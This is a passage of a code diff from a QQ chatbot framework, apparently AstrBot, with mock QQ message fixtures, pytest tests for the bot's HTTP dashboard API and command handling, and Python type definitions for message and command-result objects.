self.guild_plain_image_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'id': '2665728996', 'size': 1440173, 'url': 'gchat.qpic.cn/qmeetpic/75802001660367636/9941389-2665728996-165FCBF8BD6F42496B58A6C66C5D4255/0', 'width': 1186}], 'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'bot': False, 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '9941389', 'content': '<@!2519660939131724751> ', 'guild_id': '7969749791337194879', 'id': 'testid', 'member': {'joined_at': '2022-08-13T13:13:56+08:00', 'nick': 'Soulter', 'roles': ['4', '23']}, 'mentions': [{'avatar': 'http://thirdqq.qlogo.cn/g?b=oidb&k=mZ2Hn0BN5MLlBJTve0WIoA&kti=ZqTjnwAAAAA&s=0&t=1708501824', 'bot': True, 'id': '2519660939131724751', 'username': '浅橙Bot'}], 'seq': 1905, 'seq_in_channel': '1905', 'timestamp': '2024-07-27T20:11:07+08:00'}
self.guild_multimedia_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'id': '2501183002', 'size': 1440173, 'url': 'gchat.qpic.cn/qmeetpic/75802001660367636/9941389-2501183002-165FCBF8BD6F42496B58A6C66C5D4255/0', 'width': 1186}], 'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'bot': False, 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '9941389', 'content': "<@!2519660939131724751> What's this", 'guild_id': '7969749791337194879', 'id': 'testid', 'member': {'joined_at': '2022-08-13T13:13:56+08:00', 'nick': 'Soulter', 'roles': ['4', '23']}, 'mentions': [{'avatar': 'http://thirdqq.qlogo.cn/g?b=oidb&k=mZ2Hn0BN5MLlBJTve0WIoA&kti=ZqTjnwAAAAA&s=0&t=1708501824', 'bot': True, 'id': '2519660939131724751', 'username': '浅橙Bot'}], 'seq': 1907, 'seq_in_channel': '1907', 'timestamp': '2024-07-27T20:14:26+08:00'}
self.guild_event_id_sample = "AT_MESSAGE_CREATE:e4c09708-781d-44d0-b8cf-34bf3d4e2e64"
self.direct_plain_text_sample = {'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '33342831678707631', 'content': 'just reply me `ok`', 'direct_message': True, 'guild_id': '3398240095091349322', 'id': '08caaea38bcaabbe942f10afaf8fb08fa49d3b38a5014898c893b506', 'member': {'joined_at': '2023-03-13T19:40:31+08:00'}, 'seq': 165, 'seq_in_channel': '165', 'src_guild_id': '7969749791337194879', 'timestamp': '2024-07-27T20:12:08+08:00'}
self.direct_plain_image_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'id': '2658044992', 'size': 1440173, 'url': 'gchat.qpic.cn/qmeetpic/92265551678707631/33342831678707631-2658044992-165FCBF8BD6F42496B58A6C66C5D4255/0', 'width': 1186}], 'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '33342831678707631', 'direct_message': True, 'guild_id': '3398240095091349322', 'id': 'testid', 'member': {'joined_at': '2023-03-13T19:40:31+08:00'}, 'seq': 167, 'seq_in_channel': '167', 'src_guild_id': '7969749791337194879', 'timestamp': '2024-07-27T20:12:29+08:00'}
self.direct_multimedia_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'id': '2526212938', 'size': 1440173, 'url': 'gchat.qpic.cn/qmeetpic/92265551678707631/33342831678707631-2526212938-165FCBF8BD6F42496B58A6C66C5D4255/0', 'width': 1186}], 'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '33342831678707631', 'content': "What's this", 'direct_message': True, 'guild_id': '3398240095091349322', 'id': 'testid', 'member': {'joined_at': '2023-03-13T19:40:31+08:00'}, 'seq': 168, 'seq_in_channel': '168', 'src_guild_id': '7969749791337194879', 'timestamp': '2024-07-27T20:13:38+08:00'}
self.direct_event_id_sample = "DIRECT_MESSAGE_CREATE:e4c09708-781d-44d0-b8cf-34bf3d4e2e64"

    def create_random_group_message(self):
        mocked = botpy.message.GroupMessage(
            api=None,
            event_id=self.group_event_id_sample,
            data=self.group_plain_text_sample
        )
        return mocked

    def create_random_guild_message(self):
        mocked = botpy.message.Message(
            api=None,
            event_id=self.guild_event_id_sample,
            data=self.guild_plain_text_sample
        )
        return mocked

    def create_random_direct_message(self):
        mocked = botpy.message.DirectMessage(
            api=None,
            event_id=self.direct_event_id_sample,
            data=self.direct_plain_text_sample
        )
        return mocked

    def create_msg(self, text: str):
        sample = self.group_plain_text_sample.copy()
        sample['content'] = text
        mocked = botpy.message.Message(
            api=None,
            event_id=self.group_event_id_sample,
            data=sample
        )
        return mocked
51
tests/test_http_server.py
Normal file
@@ -0,0 +1,51 @@
import aiohttp
import pytest


BASE_URL = "http://0.0.0.0:6185/api"


async def get_url(url):
    async with aiohttp.ClientSession() as session:
        async with session.get(url) as response:
            return await response.json()


async def post_url(url, data):
    async with aiohttp.ClientSession() as session:
        async with session.post(url, json=data) as response:
            return await response.json()


class TestHTTPServer:
    @pytest.mark.asyncio
    async def test_config(self):
        configs = await get_url(f"{BASE_URL}/configs")
        assert 'data' in configs and 'metadata' in configs['data'] \
            and 'config' in configs['data']
        config = configs['data']['config']
        # test post config
        await post_url(f"{BASE_URL}/astrbot-configs", config)
        # test post config with invalid data
        assert 'rate_limit' in config['platform_settings']
        config['platform_settings']['rate_limit'] = "invalid"
        ret = await post_url(f"{BASE_URL}/astrbot-configs", config)
        assert 'status' in ret and ret['status'] == 'error'

    @pytest.mark.asyncio
    async def test_update(self):
        await get_url(f"{BASE_URL}/check_update")

    @pytest.mark.asyncio
    async def test_plugins(self):
        pname = "astrbot_plugin_bilibili"
        url = f"https://github.com/Soulter/{pname}"

        await get_url(f"{BASE_URL}/extensions")

        # test install plugin
        await post_url(f"{BASE_URL}/extensions/install", {
            "url": url
        })

        # test uninstall plugin
        await post_url(f"{BASE_URL}/extensions/uninstall", {
            "name": pname
        })
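These tests assume an AstrBot dashboard HTTP server is already listening on port 6185. A quick reachability check before invoking pytest might look like this (a sketch, not part of the test suite):

import asyncio
import aiohttp

async def ping():
    async with aiohttp.ClientSession() as session:
        async with session.get("http://0.0.0.0:6185/api/configs") as resp:
            print(resp.status)  # expect 200 when the dashboard is up

asyncio.run(ping())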
160
tests/test_message.py
Normal file
@@ -0,0 +1,160 @@
import asyncio
import pytest
import os

from tests.mocks.qq_official import MockQQOfficialMessage
from tests.mocks.onebot import MockOneBotMessage

from astrbot.bootstrap import AstrBotBootstrap
from model.platform.qq_official import QQOfficial
from model.platform.qq_aiocqhttp import AIOCQHTTP
from model.provider.openai_official import ProviderOpenAIOfficial
from type.astrbot_message import *
from type.message_event import *
from SparkleLogging.utils.core import LogManager
from logging import Formatter

from util.cmd_config import QQOfficialPlatformConfig, AiocqhttpPlatformConfig


logger = LogManager.GetLogger(
    log_name='astrbot',
    out_to_console=True,
    custom_formatter=Formatter('[%(asctime)s| %(name)s - %(levelname)s|%(filename)s:%(lineno)d]: %(message)s', datefmt="%H:%M:%S")
)
pytest_plugins = ('pytest_asyncio',)

os.environ['TEST_MODE'] = 'on'
bootstrap = AstrBotBootstrap()

llm_config = bootstrap.context.config_helper.llm[0]
llm_config.api_base = os.environ['OPENAI_API_BASE']
llm_config.key = [os.environ['OPENAI_API_KEY']]
llm_config.model_config.model = os.environ['LLM_MODEL']
llm_config.model_config.max_tokens = 1000
llm_provider = ProviderOpenAIOfficial(llm_config)
asyncio.run(bootstrap.run())
bootstrap.message_handler.provider = llm_provider
bootstrap.config_helper.wake_prefix = ["/"]
bootstrap.config_helper.admins_id = ["905617992"]

for p_config in bootstrap.context.config_helper.platform:
    if isinstance(p_config, QQOfficialPlatformConfig):
        qq_official = QQOfficial(bootstrap.context, bootstrap.message_handler, p_config)
    elif isinstance(p_config, AiocqhttpPlatformConfig):
        aiocqhttp = AIOCQHTTP(bootstrap.context, bootstrap.message_handler, p_config)


class TestBasicMessageHandle():
    @pytest.mark.asyncio
    async def test_qqofficial_group_message(self):
        group_message = MockQQOfficialMessage().create_random_group_message()
        abm = qq_official._parse_from_qqofficial(group_message, MessageType.GROUP_MESSAGE)
        ret = await qq_official.handle_msg(abm)
        print(ret)

    @pytest.mark.asyncio
    async def test_qqofficial_guild_message(self):
        guild_message = MockQQOfficialMessage().create_random_guild_message()
        abm = qq_official._parse_from_qqofficial(guild_message, MessageType.GUILD_MESSAGE)
        ret = await qq_official.handle_msg(abm)
        print(ret)

    # Guild DMs share the same code path, so they are skipped to save overhead.
    # @pytest.mark.asyncio
    # async def test_qqofficial_private_message(self):
    #     private_message = MockQQOfficialMessage().create_random_direct_message()
    #     abm = qq_official._parse_from_qqofficial(private_message, MessageType.FRIEND_MESSAGE)
    #     ret = await qq_official.handle_msg(abm)
    #     print(ret)

    @pytest.mark.asyncio
    async def test_aiocqhttp_group_message(self):
        event = MockOneBotMessage().create_random_group_message()
        abm = aiocqhttp.convert_message(event)
        ret = await aiocqhttp.handle_msg(abm)
        print(ret)

    @pytest.mark.asyncio
    async def test_aiocqhttp_direct_message(self):
        event = MockOneBotMessage().create_random_direct_message()
        abm = aiocqhttp.convert_message(event)
        ret = await aiocqhttp.handle_msg(abm)
        print(ret)


class TestInternalCommandHandle():
    def create(self, text: str):
        event = MockOneBotMessage().create_msg(text)
        abm = aiocqhttp.convert_message(event)
        return abm

    async def fast_test(self, text: str):
        abm = self.create(text)
        ret = await aiocqhttp.handle_msg(abm)
        print(f"Command: {text}, Result: {ret.result_message}")
        return ret

    @pytest.mark.asyncio
    async def test_config_save(self):
        abm = self.create("/websearch on")
        ret = await aiocqhttp.handle_msg(abm)
        assert bootstrap.context.config_helper.llm_settings.web_search \
            == bootstrap.config_helper.get("llm_settings")['web_search']

    @pytest.mark.asyncio
    async def test_websearch(self):
        await self.fast_test("/websearch")
        await self.fast_test("/websearch on")
        await self.fast_test("/websearch off")

    @pytest.mark.asyncio
    async def test_help(self):
        await self.fast_test("/help")

    @pytest.mark.asyncio
    async def test_myid(self):
        await self.fast_test("/myid")

    @pytest.mark.asyncio
    async def test_wake(self):
        await self.fast_test("/wake")
        await self.fast_test("/wake #")
        assert "#" in bootstrap.context.config_helper.wake_prefix
        assert "#" in bootstrap.context.config_helper.get("wake_prefix")
        await self.fast_test("#wake /")

    @pytest.mark.asyncio
    async def test_sleep(self):
        await self.fast_test("/provider")

    @pytest.mark.asyncio
    async def test_update(self):
        await self.fast_test("/update")

    @pytest.mark.asyncio
    async def test_t2i(self):
        if not bootstrap.context.config_helper.t2i:
            abm = self.create("/t2i")
            await aiocqhttp.handle_msg(abm)
        await self.fast_test("/help")

    @pytest.mark.asyncio
    async def test_plugin(self):
        pname = "astrbot_plugin_bilibili"
        url = f"https://github.com/Soulter/{pname}"
        await self.fast_test("/plugin")
        await self.fast_test(f"/plugin l")
        await self.fast_test(f"/plugin i {url}")
        await self.fast_test(f"/plugin u {url}")
        await self.fast_test(f"/plugin d {pname}")


class TestLLMChat():
    @pytest.mark.asyncio
    async def test_llm_chat(self):
        os.environ["TEST_LLM"] = "on"
        ret = await llm_provider.text_chat("Just reply `ok`", "test")
        print(ret)
        event = MockOneBotMessage().create_msg("Just reply `ok`")
        abm = aiocqhttp.convert_message(event)
        ret = await aiocqhttp.handle_msg(abm)
        print(ret)
        os.environ["TEST_LLM"] = "off"
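The module-level setup above reads OPENAI_API_BASE, OPENAI_API_KEY and LLM_MODEL from the environment before the bootstrap runs, so they must be set first. A sketch with placeholder values (the real values depend on your endpoint and are not part of this diff):

import os
os.environ["OPENAI_API_BASE"] = "https://api.openai.com/v1"  # or any OpenAI-compatible endpoint
os.environ["OPENAI_API_KEY"] = "sk-placeholder"              # placeholder, not a real key
os.environ["LLM_MODEL"] = "gpt-4o-mini"                      # placeholder model name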
37
type/astrbot_message.py
Normal file
@@ -0,0 +1,37 @@
import time
from enum import Enum
from typing import List
from dataclasses import dataclass
from nakuru.entities.components import BaseMessageComponent


class MessageType(Enum):
    GROUP_MESSAGE = 'GroupMessage'    # group chat message
    FRIEND_MESSAGE = 'FriendMessage'  # private / friend (one-on-one) message
    GUILD_MESSAGE = 'GuildMessage'    # guild (channel) message


@dataclass
class MessageMember():
    user_id: str  # sender id
    nickname: str = None


class AstrBotMessage():
    '''
    AstrBot's message object.
    '''
    tag: str                             # source tag of the message
    type: MessageType                    # message type
    self_id: str                         # the bot's own id
    session_id: str                      # session id
    message_id: str                      # message id
    sender: MessageMember                # sender
    message: List[BaseMessageComponent]  # message chain, in Nakuru's message-chain format
    message_str: str                     # the plain-text string form of the message
    raw_message: object
    timestamp: int                       # message timestamp

    def __init__(self) -> None:
        self.timestamp = int(time.time())

    def __str__(self) -> str:
        return str(self.__dict__)
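For reference, a sketch of how a platform adapter might fill in this object by hand; the values are made up and Plain is just one Nakuru component type:

from nakuru.entities.components import Plain

abm = AstrBotMessage()
abm.tag = "test"
abm.type = MessageType.FRIEND_MESSAGE
abm.self_id = "10001"
abm.session_id = "user-123"
abm.message_id = "1"
abm.sender = MessageMember(user_id="user-123", nickname="alice")
abm.message = [Plain("hello")]   # message chain in Nakuru component format
abm.message_str = "hello"
abm.raw_message = None
print(abm)                       # __str__ dumps the instance dict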
78
type/command.py
Normal file
@@ -0,0 +1,78 @@
from typing import Union, List, Callable
from dataclasses import dataclass
from nakuru.entities.components import Plain, Image


@dataclass
class CommandItem():
    '''
    Describes a single command.
    '''

    command_name: Union[str, tuple]  # command name
    callback: Callable               # callback function
    description: str                 # description
    origin: str                      # where the command was registered from


class CommandResult():
    '''
    Used to return multiple values from a command handler.
    '''

    def __init__(self,
                 hit: bool = True,
                 success: bool = True,
                 message_chain: list = [],
                 command_name: str = "unknown_command",
                 use_t2i: bool = None) -> None:
        self.hit = hit
        self.success = success
        self.message_chain = message_chain
        self.command_name = command_name
        self.is_use_t2i = use_t2i

    def message(self, message: str):
        '''
        Quick reply with a text message.

        CommandResult().message("Hello, world!")
        '''
        self.message_chain = [Plain(message), ]
        return self

    def error(self, message: str):
        '''
        Quick reply with an error message.

        CommandResult().error("Hello, world!")
        '''
        self.success = False
        self.message_chain = [Plain(message), ]
        return self

    def url_image(self, url: str):
        '''
        Quick reply with an image (from a web URL).

        CommandResult().url_image("https://example.com/image.jpg")
        '''
        self.message_chain = [Image.fromURL(url), ]
        return self

    def file_image(self, path: str):
        '''
        Quick reply with an image (from a local file path).

        CommandResult().file_image("image.jpg")
        '''
        self.message_chain = [Image.fromFileSystem(path), ]
        return self

    def use_t2i(self, use_t2i: bool):
        '''
        Set whether to use the text-to-image service. If unset, the user's own setting is followed.
        '''
        self.is_use_t2i = use_t2i
        return self

    def _result_tuple(self):
        return (self.success, self.message_chain, self.command_name)
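A short usage sketch of the chainable helpers above (hypothetical handler code, not part of the diff):

# A successful reply, forcing the text-to-image service off for this message:
result = CommandResult().message("pong").use_t2i(False)

# A failed command, reported back as an error reply:
result = CommandResult(command_name="ping").error("the upstream service is unreachable")

# A reply carrying an image from a URL:
result = CommandResult().url_image("https://example.com/image.jpg")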